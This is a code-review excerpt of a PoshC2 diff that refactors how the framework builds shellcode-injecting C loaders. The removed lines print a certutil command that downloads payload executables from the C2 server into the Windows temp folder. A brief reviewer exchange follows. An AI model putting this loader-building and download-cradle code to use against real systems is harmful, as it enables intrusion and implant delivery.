poshc2/server/Payloads.py

```diff
@@ -313,361 +312,308 @@ def CreateShellcode(self, name=""):
-        filename = "%s%sPosh32_migrate.c" % (self.BaseDirectory, name)
-        output_file = open(filename, 'w')
-        output_file.write(ccode)
+        # Create the raw C file from the template
+        content = open("%s%s" % (PayloadTemplatesDirectory, sourcefile), 'r').read()
+        content = str(content) \
+            .replace("#REPLACEME#", str(shellcode32)) \
+            .replace("#REPLACEMEPROCESS#", migrate_process)
+        output_file = open("%s%s%s%s32.c" % (self.BaseDirectory, name, payloadtype, sourcefile.replace(".c","")), 'w')
+        output_file.write(content)
         output_file.close()
 
-        try:
-            firsturl = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server"))
-            uri = f"{firsturl}/{self.QuickCommand}_ex86"
-            filename = randomuri()
-            self.QuickstartLog(Colours.END)
-            self.QuickstartLog("Download Posh64 & Posh32 executables using certutil:" + Colours.GREEN)
-            self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri, filename))
-            if os.name == 'nt':
-                compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64.c -o %s%sPosh64.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
-                compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32.c -o %s%sPosh32.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
-            else:
-                compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64.c -o %s%sPosh64.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
-                compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32.c -o %s%sPosh32.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
-            subprocess.check_output(compile64, shell=True)
-            subprocess.check_output(compile32, shell=True)
-            uri = f"{firsturl}/{self.QuickCommand}_ex64"
-
-            filename = randomuri()
-            self.QuickstartLog("certutil -urlcache -split -f %s %%temp%%\\%s.exe" % (uri, filename))
-            if os.name == 'nt':
-                compile64 = "C:\\TDM-GCC-64\\bin\\gcc.exe %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
-                compile32 = "C:\\TDM-GCC-32\\bin\\gcc.exe %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
-            else:
-                compile64 = "x86_64-w64-mingw32-gcc -w %s%sPosh64_migrate.c -o %s%sPosh64_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
-                compile32 = "i686-w64-mingw32-gcc -w %s%sPosh32_migrate.c -o %s%sPosh32_migrate.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
-            subprocess.check_output(compile64, shell=True)
-            subprocess.check_output(compile32, shell=True)
+        # work out the compiler per OS
+        if os.name == 'nt':
```

Comment:
Same here with the Windows stuff

Reply:
Yeah, just removed to all places. Nice spot